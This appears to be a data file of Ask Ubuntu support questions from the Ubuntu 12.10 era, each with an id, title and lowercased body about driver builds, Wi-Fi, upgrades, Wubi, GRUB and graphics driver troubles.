203078	wireless card realtek rtl8723ae-bt driver not compiling on quetzal	hello , i followed the instructions on this answer but at the make command i got this : $ make make -c /lib/modules/3.5.0-17-generic/build m=/home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-17-generic' cc [ m ] /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-17-generic' make : *** [ all ] error 2 ubuntu @ ubuntu : ~/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 $ sudo make install make -c /lib/modules/3.5.0-17-generic/build m=/home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-17-generic' cc [ m ] /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/ubuntu/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-17-generic' make : *** [ all ] error 2 please help me solve this , thank you . added by oxwivi , also facing the same issue : i followed the instructions as well , and they worked perfectly on precise , without a single error . i 've edited the question and added quetzal to question and tags in addition to improving the question 's format . thank you for understanding .
203080	ca n't connect to my own wifi network	i use ubuntu 12.04 on various differents laptops/netbooks on my home . i was able to connect to my own wifi network . but sometimes , i could n't connect to my wifi network , it ask me for password again and again . after many tries ( a lot of them ) , sometimes i can connect , but sometimes i ca n't . i have this problem with a samsung netbook and with a hp laptop . right now , i ca n't connect with the hp laptop . i 'll be grateful for any help . best regards , nicolรกs
203083	how can i fix a ubuntu upgrade when it was interrupted by a power outage ?	i hope someone can point me in the right direction . i was upgrading to ubuntu 12 , then the power died and i fixed the broken packages . the system asked to reboot but now i am unable to boot ( hangs during boot sequence ) . i am able to get into terminal and have mc to view files . i have tried previous versions under the advanced boot , but all fail to load . can someone point me in the right direction to find out what went wrong ? thanks in advance .
203085	new dash features and online accounts missing after 12.04 to 12.10 upgrade	i performed upgrade to 12.10 from 12.04 using update-manager . unfortunately , there was some error , because when i came back from the coffee , the screen was black . i opened a terminal ( ctrl+alt+f1 ) and killall dpkg , which ( based on logs and ps outuput ) seemed to be waiting for user input for configuration file update ( xdg package , if i remember well ) . after that , i did a do-release-upgrade , which seemed to work well , because i ended on a graphic session after reboot . the problem is that some 12.10 features are missing , as online accounts and dash new online results . this made me suspicious of missing packages or something like that . please take a look at upgrade logs and my new dpkg -- get-selections output : https : //gist.github.com/3919006 dpkg -- reconfigure -a did n't solved the problem nor apt-get -f install showed any problem . do-release-upgrade say my system need no news packages ( even if i change /etc/lsb-release to 12.04 ) if someone give me a dpkg -- get-selections of a vanilla 12.10 installation , may be i can force system reconfiguration .
203088	where can i find a 12.10 dvd image ?	while i 'm open to buying a dvd from the shop , i 'd rather download a dvd image , but i ca n't find it on the download page ( only the cd images and the option to buying a dvd ) . i have slow internet where i live , i always relied on the alternative cd . but now with it gone for 12.10 , so i looked for alternatives ( dvd image ) . so where can i find a dvd image , or is the only way to get one is to buy a dvd from the shop ?
203090	how to disable chameleon effect in unity ?	well , there was myunity in 12.04 for this . but what should i do now ? i want black or gray dash and notifycations , not orange or green .
203096	is there any way by which i can make webapps open in a new tab instead of a new window ?	i have installed these webapps in my ubuntu 12.10 : facebook , gmail , youtube and they work fine . however while launching the website from the corresponding webapp , it always opens in a new window of my default browser . is there any way by which i can make them to open in a new tab instead of a new window ?
203097	installer says i 'd need a wireless firmware , but wlan works without it out of the box	while installing 12.04.01 ( alternate ) on a netbook ( samsung n150plus ) , ubuntu informed me that i 'd need the firmware brcm/bcm43xx-0.fw . i skipped this step . if i understand this page correctly , the mentioned firmware is a wlan driver . however , after the ubuntu installation was completed , the wlan worked out of the box . after a few minutes , ubuntu informed me that there is a firmware update available , which would be the mentioned firmware . do i need to install this ? is ubuntu using some kind of `` lite '' wlan driver and i might run into problems with certain networks in the future , if i do n't use the firmware ? would there be benefits in using the firmware ? ( maybe longer runtime because of lower consumption ? )
203100	what does `` would you like to install twitter '' mean ?	firefox in ubuntu 12.10 pops up messages such as ( similar messages for reddit , facebook , etc . ) : '' would you like to install twitter for extra features and quicker access ? '' what do they mean ? what exactly gets installed and where ?
203103	ca n't login to ubuntu one	i uninstalled ubuntu one about two months ago and now i re-installed it . i can still login with my account through the site ( ubuntu one ) but the client keeps telling me `` the authentication failed '' . if i try to use the recover password option it also fails with telling me that my email address is not recognized ( while i can use it with zero issues through the site ) if i attempt to create a new account from the client , it also fails to load the captcha every time . something is clearly broken here but i ca n't figure out what it is . any ideas ?
203113	how to debug webapps	i 'd like to create a webapp to integrate with a music website and include the played songs in the sound menu . i 'm looking at the code for the grooveshark and pandora scripts as an example that is helping me get started . however , i do not quite grasp what 's happening behind the scenes and i 'd like to debug my script to see how it works . what 's the best way to debug webapps ?
203114	unity dash and top toolbar wo n't open after updating to 12.10	today , i updated to ubuntu 12.10 . after re-starting , like the updater suggested , the toolbar on the top of the screen , and the dash wo n't load . i seem to be missing other features , as well , like alt > tab to switch windows , etc . i am able to access the terminal , by typing ctrl > alt > t , which is how i was bale to access firefox . how do i fix this problem ? edit : 10/20/12 i resorted to completely re-installing ubuntu . if someone finds a way to fix this problem without completely re-installing , please feel free to post it below . edit : 5:18 pm on 10/19/12 i am probably not the only one who has noticed this , but i just found out that ubuntu works fine if booted into gnome . the probalem seems to be with unity , and people have been saying it 's also a problem with ati graphics cards . i have tried many of the suggestions in the other threads that have been suggested , and nothing seems to work . other idea 's would be appreciated ! edit : 2:10 pm on 10/19/12 as chris carter suggested , i 'm including the results of the teminal command lspci here is my graphics card info : 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs780m/rs780mn [ mobility radeon hd 3200 graphics ]
203115	`` could not load /lib/modules/3.5.0-4-generic/modules.dep : no such file or directory '' when running update-initramfs	i have a standard ubuntu 12.04 ( 32bit pae ) installed . at one time i used xorg-edgers ppa ( i wanted to see how far nouveau has gotten ) which also provided a linux kernel 3.5.0.4 . since edge xorg made my system unstable i used ppa-purge to downgrade packages to stable which also uninstalled kernel 3.5.0.4 , but the removal process did n't remove 3.5 images in /boot , which has caused warnings during package operations when a package would trigger update-initramfs : fatal : could not load /lib/modules/3.5.0-4-generic/modules.dep : no such file or directory deleting 3.5 images in /boot made the warnings go away , but after today 's update they are back again . none of the 3.5 deb packages are installed but somehow my system remembers that it had a 3.5 kernel at one time . i 'm wondering where this info is stored and how can i remove it .
203116	dropbox wo n't change default directory	seems to be a problem in the 64 bit version of dropbox i 'm trying to install . on a fresh install of 12.10 i need to be able to set a different path for the dropbox directory ( not the standard placement in home ) . although iâve done this before , here when i try to change it in the advanced settings it leaves the default directory . canât get it to actually change to a different drive/directory .
203118	black screen with blinking cursor !	from my windows xp sp3 machine , i downloaded the live image file for ubuntu 12.04 lts . i then burned a bootable cd . then i went into the bios and set installation settings to ( first ) cd drive and ( second ) disabled . however , when i boot i only get a black screen with a blinking cursor . after some time i might get some error messages . even if iâ leave it for hours i get nothing . fyi : i do n't know how to go to the grub menu . please make the answers easy since i am a young beginner .
203122	how do i do a minimal install without an internet connection ?	now that various ubuntu isos has been folded into the regular desktop iso , how do i install the minimal version which featured in the erstwhile alternate and the minimal iso ? minimal cd regarding minimal cd , it can install minimal ubuntu but requires net connection to download even the basic that basic set of ubuntu packages . and therein lies the problem : i do n't have a lan connection i can use and , even if text-based installers did support wireless connections ( they do n't , ime ) , my wireless hardware is a little too new and requires manually compiling and installing drivers . if you do have net connection and want to install minimal ubuntu , minimal cd is the way to go .
203124	upgrading kubuntu to version 12.10 stops	it 's on the step `` installing the upgrades '' , says it 's `` configuring virtuoso-opensource-6.1 '' , and the last line in the log is `` unpacking linux-headers-3.5.0-17 ( from ... /linux-headers-3.5.0-17_3.5.0-17.28_all.deb ) ... '' .. and the application just sits there doing nothing . trying to abort now says `` the system could be in an unstable state if you cancel the upgrade '' , so i 'd rather not do that : / any idea how i can kick the upgrade into gear again ? edit : i closed the program , ran dpkg -configure ( which failed ) . booted ran configure again , some configuration , and things are up and running again . i 'm leaving this open as i have no idea what the root cause was .
203130	how do i integrate dropbox in sync menu indicator ?	is there anyway to integrate dropbox in the sync ( cloud ) menu indicator ?
203132	restoring webapps after trashing them in unity	to remove a webapp for a website i took his icon from the unity launcher to the trash icon . now i want to restore the same webapp : how should i do it ? note : sudo dpkg-reconfigure unity-webapps-xxx does not work .
203134	ubuntu from a flash drive , where do files get stored ?	i 'm a total newb to ubuntu ( linux in general , tbh ) and i 'd like to try out ubuntu by running it from a flash drive . now my question is : do my files ( both installation and 'personal ' files ( like texts , for example ) ) store on my flash drive or on my hard disk ?
203140	ubuntu one ipcerror error	i just upgraded to ubuntu 12.10 . now , when i try to enter ubuntu one , i get : ipcerror . and another error associated with that : the crashed program seems to use third-party or local libraries : /usr/local/lib/python2.7/dist-packages/twisted-11.1.0-py2.7-linux-x86_64.egg/twisted/internet/_sigchld.so /usr/local/lib/python2.7/dist-packages/twisted-11.1.0-py2.7-linux-x86_64.egg/twisted/python/_initgroups.so it is highly recommended to check if the problem persists without those first . do you want to continue the report process anyway ? anyone can help ?
203142	other software checkboxes in software sources are not working after update to 12.10	when i 'm trying to enable some sources in `` other software '' in `` software sources '' i see an auth prompt , but when i 'm insert password , i see no changes of checkboxes states . what can i do to fix this ?
203143	not locking screen after x minutes	since i upgraded from ubuntu 11.10 to 12.04 ( and also 12.10 problem still occurs ) , my notebook does not lock the screen automatically . i wen into `` brightness and lock '' settings , set `` turn screen of when inactive for 1 minute '' and also the `` lock screen after 1 minute '' . but the screen never locks . the screen goes off , and after certain random time it goes back on , and not locked . so , if i leave my office , the screen turns off , but suddenly after a while it turns back on , and anyone can access my computer . obs . : ubuntu 12.10 x64 , gnome-shell 3.6.1 , dell integrated graphics .
203144	awful green shadows round the chars and icons on panel ( radiance theme , ubuntu 12.04 )	i 'm using ubuntu 12.04 and in radiance theme have awful green shadows round characters and icons on panel .
203146	boot problems ubuntu 12.10 samsung series 9 900x3c	i just upgraded to 12.10 and i 'm having considerable boot problems on my samsung series 9 900x3c . most of the time nothing happens and a hard reboot has to be done . every couple of times the laptop actually boots but it still seems to be quite volatile as kernel panics occur quite often . any ideas how to fix these issues ? thanks a lot in advance best regards jo
203155	will the nvidia-experimental-310 be packaged for 12.10 ( quantal ) ?	nothing much to add outside the title . the package is currently available for 12.04 , but not 12.10 .
203157	timeout in a connection to a dhcp server	i want to configure my eth0 interface using an external dhcp server ( resident in my subnet ) , so i edited /etc/network/configure with the lines auto eth0 iface eth0 inet dhcp but i also want to use avahi autoconfiguration when the dhcp server is down . so i tried ifup eth0 when the server is down , and after a certain amount of time it fails , but the interface eth0 : avahi is correctly configured . what i 'm looking for is a way to decrease the amount of time spent trying to connect to a dhcp server . and ... is this the right way to use avahi when there 's no dhcp server ?
203158	can i add ubuntu fonts to website ? what are licenses of those ?	basically i would like to use on website a `` norasi '' font , that was bundled with ubuntu , but i can not find any license . am i allowed to distribute that font through website ? what is its license ?
203159	new encryption feature in ubuntu 12.10 : home encryption or full disk encryption ? or both ?	how do i correctly encrypt the entire partition when installing ubuntu 12.10 ? i ask because the new ubuntu installer now shows two encryption options . after choosing `` encrypt the new ubuntu installation for security '' , the `` encrypt my home folder '' option is still offered later on . do i need to check both options to have full encryption , or just the first option ? what will happen in each case ?
203162	software updater	when i run `` software updater '' i get the following message : do n't know what this could be , as my internet connection is perfectly fine . any suggestions ? w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
203163	vostro 3560 wireless on ubuntu 12.10	i have been using ubuntu 12.04.1 lts on a dell vostro 3560 for some time now . at first i had issues with the wireless but i was pointed to a driver from ubuntu 11.xx for a broadcom bcm43142 and that did work ! however with the upgrade to 12.10 i find myself at a lost because the driver will not work anymore . when trying to reinstall it i get `` driver of bad quality '' i still install it but it just wont work . i cant seem to find anything on this issue for 12.10 and did n't know if anyone had any advice or if someone could point me in the right direction on resources to write my own driver for it . as i know c/c++ but have never written a driver for a linux machine before . thanks for any help ! to be more clear i installed ubuntu 12.10 desktop on my dell vostro 3560 laptop . when i log in , my wireless card is n't visible in the network manager popup menu , although the wired network shows up there . i installed the driver mentioned below and that did help me on 12.04 but is now broken due to `` poor quality '' a sudo lspci -nn command brings up : 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) **02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) **
203164	ryhthmbox missing problem	i have a problem with ryhthmbox , after update packages , i missed ryhthmbox , it does n't exists in panel ( ryhthmbox menu ) and even in software list . . . so what should i do ? how can i install it again ! ? ? : (
203173	run application on local machine and show gui on remote display	is it possible to run an application on my local desktop but display the gui on my laptop ( remote x ) ? i 'm wondering if it is possible to emulate a dual-monitor setup using 2 distinct lan connected machines . i have installed synergy and i can easily control my laptop with the desktop keyboard/mouse , but i would also like to just run something on the desktop and display the gui on the laptop screen . from my limited experience with x , i know that i can run a program on a remote machine and use the display of the first to show the output , but not the other way around . any pointers would be of great help . thank you p.s . running xfce 4.10 on ubuntu 12.10
203175	unable to install ubuntu 12.10 with wubi in windows 7 - wubi is stuck	i tried installing using wubi . it is stuck at the `` 1 hr remaining '' -message for several hours . the same has happened in previous 4-6 installation attempt . what could be the problem ?
203178	remove eclipse plugin from command line	after upgrading ubuntu , eclipse has been upgraded to 3.8 . now , eclipse does not start anymore . i know that at least one plugin is not compatible with 3.8 . but i do n't know how to remove it , without the gui . so , how can i remove a plugin from the command line ? the log of eclipse can be found here : http : //pastebin.com/8xek58nl
203181	grub rescue prompt after 12.10 upgrade	dual boot hp desktop that had windows 7 and ubuntu 12.04 working fine until yesterday . upgraded to 12.10 and the grub install gave an error of not being able to write to the boot sector . it looks like the situation is similar to the one in this bug . here is the pastebin from an unsuccessful boot-repair - http : //pastebin.ubuntu.com/1290132/ not booting at all now and goes back to grub rescue all the time . can someone help so that the system shall start booting again ?
203184	upgrade to 12.10 from 12.04 not available in update manager	my update manager does not give me the option to upgrade to ubuntu 12.10 . that is , the `` new distribution release '12.10 ' is available . click upgrade and follow the on-screen instructions '' section is not shown . i had the same problem upgrading to 12.04 . spent hours trying to upgrade the system , got lucky somehow , donât definitively know how . what i have done , used synaptic to clear package cache . reloaded package list and upgraded all packages . checked that ubuntu-standard and ubuntu-desktop packages are installed . checked that the `` notify me of new version '' setting in update-manager is set to `` all new versions '' update manager reports there are `` no new updates '' sudo do-release-upgrade -d reports no release available running update-manager -d does not help . cat /etc/lsb-release output is : distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts similar problem 1 | similar problem 2 | similar problem 3
203191	asus u24a ca n't boot without live disk	i recently picked up a new asus u24a while travelling in asia . i 've managed to go through hell with the uefi setup , and finally now have a working grub . however , i ca n't manage to get past the `` loading initial ramdisk '' . if i boot the live cd-usb ( only in bios legacy mode ) , i get a wonderful , working ubuntu . i finally managed to get uefi installed on the hard-drive ( no option for legacy bios boot , or i 'd be there in a flash ! ) , and can boot in uefi mode into grub2 . but ... i ca n't manage to get past the `` loading initial ramdisk '' . it appears that the disk drivers are failing ( there is no disk activity after this point ) . ideas ? pastebin from the boot-repair is at : http : //paste.ubuntu.com/1290011/ best , -tony new ( 22.10.2012 ) : well , one of the problems seems to be that when i boot in uefi mode , the hard disk is not recognized by the boot loader . it 's a standard gpt formatted disk , but the boot loader ( grub command line , or shell.efi 's ) ca n't seem to find it . thoughts for what to load in order to get it recognized ? i 've tried loading part_gpt and similar other obvious candidates ingrub , but does any one have an incantantion i can study for `` installing '' a disk which is not seen ? so here 's what really bugs me -- if i boot in legacy compatibility mode from the usb sticks , i get all of the file systems ( hd0 , hd1 ) , but if i boot in uefi mode , i just get the usb stick . does this have anything to do with a secure uefi safe mode , or something ? or something else ?
203195	ubuntu 12.10 is reading mouse battery as a laptop battery	i have a bluetooth mouse connected to my laptop . much to my delight ( i posted the suggestion ! ) the mouses battery is now displayed along side the laptop 's battery . unfortunately is is named simply `` battery '' in the drop down and `` laptop battery '' once the power statistics windows is opened . the details of this battery correctly say that the model is a lenovo bluetooth mouse , but it is still displayed as a `` battery '' and `` laptop battery '' . is there anyway to change this ? edit : plus the `` show time in menu bar '' shows the mouse 's remaining battery percentage as opposed to the laptop battery 's remaining time .
203201	upgrade 12.04 to 12.10 using startup disk	i 'm trying to upgrade 12.04 to 12.10 using a startup disk , but when i am supposed to choose the type of installation i want , upgrade option is not available . can anybody help ? i do n't want to use update manager .
203204	ubuntu 12.10 installation problem in wubi	i 'm trying to install ubuntu 12.10 on drive `` i : \ '' along my windows 7 with wubi . but i got the following error message : error executing command > > command=c : \windows\system32\bcdedit.exe/set { 0bfbf1c0-11ba-11e2-a8ef-fooae3684131 } device partition=i ; > > retval=1 ; > > stdrr=an error has occured setting the element data . the request is not supported . > > stdout= for more information , please see the log file ; c : \users\hammer~1\appdata\local\temp\wubi-12.10-rev273.log what should i do now ? @ http : //askubuntu.com/users/5592/agmenor is too large for this content area ( exceeds limit ) . and the the `` bcbc '' link is same to my problem.but i ca n't fix it till now . any suggestion please ?
203207	evince shows font in too big style when opening pdf from internet	when choose some pdf document to be opened by evince from a www-site , it shows the document with font size 300 % . how can i change it to show the document by font size 100 % ? the same issue occurs both in firefox and in chrome . i 'm using ubuntu 12.10 , evince 3.6.0 , firefox 16.0.1 and chrome 22.0.1229.94 .
203209	how do i remove c : /ubuntu folder ?	i downloaded ubuntu with wubi-installer on my windows 7 machine but after restarting pc and booting in ubuntu installer my pc shuts down while installing because my laptops battery was gone empty i forgot to plug in my adapter so ubuntu fails to install , then i booted in windows 7 to uninstall ubuntu from add/remove programs en reinstall but the uninstaller did not fully remove the files i still have i folder in my c : /ubuntu when i double click on that folder my explorer.exe stops responding and than i need to open the task manager to kill the explorer.exe process and restart it and right clicking does the same thing i ca n't do anything with c : /ubuntu folder to reinstall ubuntu with wubi . i have used unlocker1 . 9 to remove the folder but i get an error saying error 0x8007045d : the request could not be performed because of an i/o device error huh ! edit : okay i fixed my problem after following this instruction !
203211	remove password attempt at sudo 12.10	i just installed quantal quetzal and when i type sudo in the terminal it asks for the password . before upgrading , i changed something in the file , and it wouldnât ask for passwords . i have already tried advice from many websites , but none of them worked . does 12.10 differ with sudo in any way ? if anyone can tell me which file to change to fix this , that will be great .
203218	partitioning a 128gb ssd and 500gb hdd	so i have a 128gb ssd and 500gb hdd . i want to re誰nstall my laptop and put ubuntu 12.10 on this setup . i already looked around on the internet and came up with this partitioning schema : about 2gb of swap on the ssd ( i got 4gb of ram in my laptop ) / using the rest of that space /home on the hdd so i was wondering , are there any better schemes or extra partitions that i should consider putting on a particular drive ? thanks in advance ! : )
203219	grub-pc update failing	during the upgrade from 12.04 to 12.10 , grub-pc failed to update . dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : grub-pc i have already tried apt-get purge grub-pc and reinstalling it , but the same error keeps coming up . during the upgrade a few windows from grub popped up asking me if i wanted to keep or replace the configuration files for grub . i clicked the `` keep '' button on all of them . i suspect that might be the problem
203220	can the gnome 3.6 notification area be shrinked ?	i find the gnome shell 3.6 changes to the message tray irritating . is there a way to switch the message tray to the old model or to at least shrink the items and stop it from pushing the entire desktop when being summoned ?
203222	canât enter insert mode in vi editor	i am using the vi editor on my desktop ubuntu 12.04 , and do no have any problems . but a few days ago , i installed the vi editor to my beagleboard-xm which has both angstrom and ubuntu 12.04 available but noticed that i can not activate the insert mode at both of the op . systems . how i understood that : when i press i or i , i do not get a warning on the bottom , just -- insert -- . but if i continue and if i press k , the cursor moves to the line above , and if i press j , the cursor moves to the line below . if i try to put a # to comment out something , the cursor moves randomly and according to warning written at the bottom : `` search hit top , continuing at bottom '' , etc . etc . how can i get into insert mode ? any suggestions ?
203227	difference between ubuntu 64 bit for macs and just ubuntu 64 bit ?	what specifically is the difference between ubuntu 64 bit for macs and just ubuntu 64 bit ? edit : is there any difference except uefi and the boot procedure , like drivers , daemons , etc ?
203228	is there a version of the wubi installer that can be used offline ?	i have a pc with windows currently running on it with no internet connection , and i 'd like to try ubuntu on it without creating or modifying partitions . however , i see that the wubi installer download is ~2.4mb , which is far smaller than an ubuntu iso . is there any way of achieving a wubi or similar install on the pc in question without connecting it to the internet ? ( i have other computers with internet connections fr downloading files , etc ) thanks for taking your time to read this .
203229	hostid . what is it and is there a problem with hostid on ubuntu 12.04 ?	what exactly is the hostid ? is it equivalent to the hwaddr / mac address or is it a unique identifier that is derived from the hwaddr addresses ? i am trying to activate the maple mathematical software but it gives me an error stating that the software was unable to determine the hostid . i have followed all the instructions listed in the following help page from maplesoft but with no luck so far . http : //www.maplesoft.com/support/faqs/detail.aspx ? sid=32610 when i enter hostid into teminal it outputs “007f0101” which is probably incorrect . i read that a hostid is supposed to produce a unique identifier for each unix like machine but i have tried hostid on two different ubuntu 12.04 installations and they both return the same “007f0101” sequence . something is amiss i would reckon unless i have misunderstood what a hostid is . oh , this ubuntu installation was done with the wubi installer so it is technically on a virtual disc which resides in the windows partition from what i gather . i have a feeling that may be a problem but that doesn ' change the fact that the hostid was the same on two different computers , one of which was a standard installation . does anyone have any idea what the issue might be with regards to the hostid ? thanks !
203232	radeon hd 2000 , 3000 , 4000 on ubuntu 12.04.2 and higher : fglrx ( legacy ) unsupported , what to do ?	after upgrading to 12.10 quantal , the packaged version of fglrx no longer works . i discovered that this is because there is a separate 'legacy ' fglrx driver for the hd 2k-4k series cards , but it is incompatible with the xorg server on 12.10 . this is the most current version of the driver for hd 2000 through hd 4000 series cards . you ca n't use the non-legacy fglrx driver , but you can use the open-source radeon driver if you prefer your wm compositing to be laggy and your youtube videos to play like they would on a pentium mmx series : http : //support.amd.com/us/kbarticles/pages/catalyst126legacyproducts.aspx usually this driver can be installed in the following way , necessary because apt-get install fglrx would pull in the non-legacy driver : wget http : //www2.ati.com/drivers/legacy/amd-driver-installer-12.6-legacy-x86.x86_64.zip unzip amd-driver-installer-* sudo sh ./amd-driver-installer-*.run -- buildpkg ubuntu/quantal sudo dpkg -i fglrx*.deb sudo aticonfig -- initial -f if you use a different version of fglrx ( for example , a newer 12.9 that does n't support those cards ) then the final command will give you an error no supported hardware detected or something similar . however , everything works at this point and you will get a reasonable xorg.conf : ... other stuff section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:5:0 '' endsection ... other stuff at this point you 're supposed to reboot and everything will be working with the fglrx driver . however , upon rebooting , you 'll be treated to the following errors in xorg.0.log when fglrx attempts to load : ( ee ) failed to load /usr/lib/xorg/modules/drivers/fglrx_drv.so : /usr/lib/xorg/modules/drivers/fglrx_drv.so : undefined symbol : noxfree86driextension some searching around will show that this is a problem with the legacy ati drivers not supporting xserver 1.13 or newer . ( arch linux thread ) ati has released a fixed driver for its most recent ( hd 5000 series or later ) cards , but not for the 'legacy ' cards yet . the non-legacy ati drivers ca n't be used with the old cards . what should an ubuntu user , using one of these hd 2000-4000 series cards , do ? wait for an updated 'legacy ' ati driver that properly works with xserver 1.13 ? downgrade back to 12.04 precise , which uses xserver 1.11 ? try to downgrade xserver on 12.10 quantal to 1.12 , which could possibly break unity and gnome ? forced upgrade to hd 5000 series or later card ? ( not possible with integrated graphics ... ) some other 1337 action that fixes this problem painlessly ?
203233	how do i change this theme 's menu behavior back to 12.04 's behavior ?	using a radiance derived theme in 12.04 the menu item pointed to by the mouse or selected by cycling through using the keyboard was always had a single color background and a contrasting text color ( in my case , the item pointed to was white text on a blue background while other items are black text on a gray background . after upgrading to 12.10 the unselected items are as usual but the pointed to item now has white text on a pale gray background rectangle on top of the blue background . i 'm guessing that one definition in the gtkrc file has been added or split into two , but i ca n't immediately see which one it is . there is a similar effect in the places bar in applications , e.g . in gedit 's file open dialog box and nautilus ' places bar above the window displaying the content of the folder ( you can guess i do n't know the correct terms for these particular features ) . i 'd like to have the same behaviour as i had with 12.04 . which definition needs modifying or is there a new one i need to add ?
203234	internal speakers do not work on an asus a3ac	i have a new ( from scratch , not update ) installation of ubuntu 12.10 on my notebook , asus a3ac ( it is based on intel centrino - pentium m with full duplex intel hda codec ) . in older versions of debian-based systems intel hda audio did n't work correctly . alsamixer display wrong outputs and inputs ( more than notebook really have ) . in clean installations internal speakers were playing , but they did n't mute when headphones was plugged in . there was a solution ( propably not the best but working ) - edit as root /etc/modprobe.d/alsa-base.conf and add a line `` options snd-hda-intel model=z71v position_fix=1 '' . after restart it worked correctly ( alsamixer displayed correct devices and internal speakers were muted after i plugged in headphones ) . it was also working in ubuntu 12.04 . in ubuntu 12.10 i have another problem . the alsamixer in default ( do n't have to edit alsa-base.conf ) display correct outputs and inputs but internal speakers do n't working if the headphones is n't plugged in . i have to manually disable `` auto-mut '' option in alsamixer , then the internal spakers works ( but of course they do n't mute when the headphones are pluged in ) . thanks for any idea how to fix it . i 'm not sure if it is a bug or it 's caused by a `` specific hardware '' . tomas
203241	for macs : why does ubuntu encourage booting from a dvd instead of a usb ?	i would like to have ubuntu run from a usb drive . it would be so much more convenient , but i am not sure why ubuntu encourages a dvd instead .
203243	configure packages during unattended installation	when installing certain packages , configuration options are presented at the end of the installation . however , when doing an unattended installation , it seems that the default options are always chosen . is there a way to specify the options that i want to be selected during an unattended install ( perhaps via some sort of configuration option ) ?
203248	wireless adapter not working after 12.10 install	i have just installed ubuntu 12.10 on my dell pc and now my wireless adapter will not work at all ? the wireless adapter is a belkin n1 wireless adapter , is there a way to get this working ? thanks
203253	ca n't install libcairo2-dev under ubuntu 12.04	i 'm trying to install libcairo2-dev package on ubuntu 12.04 . the error message is as follows : requires : libcairo2 ( = 1.10.2-6.1ubuntu2 ) but 1.10.2-6.1ubuntu3 is about to be installed requires : libcairo-gobject2 ( = 1.10.2-6.1ubuntu2 ) but 1.10.2-6.1ubuntu3 is about to be installed requires : libglib2.0-dev but it wo n't be installed do n't really know what to do next , tried googling but with no luck : (
